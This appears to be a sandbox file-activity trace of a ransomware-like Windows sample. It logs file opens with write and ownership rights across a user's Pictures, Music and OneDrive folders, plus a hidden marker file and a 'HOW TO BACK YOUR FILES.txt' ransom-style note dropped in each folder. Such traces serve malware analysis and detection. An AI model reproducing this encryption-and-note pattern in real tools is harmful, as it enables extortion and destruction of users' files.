Create C:\Users\FD1HVy\Pictures\5e7Wc.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\5NeoW1fKEkQU.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\7snkBq.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\7V2nOIAHdw9cQ.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\7ZNXracFupquDdAVyh.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\AMY25182fq.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Aq_JMuY.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Ce1PVVjhKneKv.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\D tDC8K.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\EdaNrSsz8PG4d9S.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\EsY7H_GddWmcCw.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\gjrmcE0fc5l.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\HQIARmS0E7.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\iOQr98FaIzfNvYuwjB9.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Ir5ZI.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\jpJ811wuLbp.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\jykDBuh.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\mNtSm.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\oNuU.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\oOFV7u.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\PJWPk3ZGq4tLQ1TaA.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\QNXsOD0CxQccs.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\qwNICVapgEY_croJBzk.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\S 0Jzd8n.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\SEPWWo1.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\udmWUxt.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\v9mOV_kgH.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\vGoIqs1-6HE.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\VkOhDAWokkfYOk9.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Y0AydhkNNUR2.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\YGhL_kMC_eqFIP.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\ykv5 pVyi.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\yOcAT3Ep59x.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\OneDrive\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\5oW38z-l_J.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\7h4-5A5wS wr.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\i6PnD5hZJ2yN.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\J42Z.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\_Z19.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\DFuSzaknIrmv.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\hBfw7IT.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\xS0okhLxs9IE8.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\BTTuE.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\VF2Fp5QeqqLYfl8gl.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\ZaPyz5 MC4yqLqS.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\ahtik 3dEIDK LesPgbT.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\GXnNaU1iM6.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\lxupC1v-qiWR2UlBD.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\OAj iWDFaki.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\oJFUvhouKderw.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\-edB1.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\2qH DKgW.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\SiPc-hdOB.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\2kQpVkJLVFCbCOvx.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\aW4QN.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\G_JtWgQVBTJ7M2pd_.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\TI1y-X-BXK09.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\tMHF 2k.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\4f5YCJ0pI.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\bpiTJAjWP1.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\dhAbWJ5UgoBr80.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\oe8JSBpRp6FDH0.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\WYQAYXsDjvTvV PGyfOr.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\3faLNgmV.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\IFQuAHV5i3JZ nilsZg.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ddgoRP\iJM5 PvfbTCo- In.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
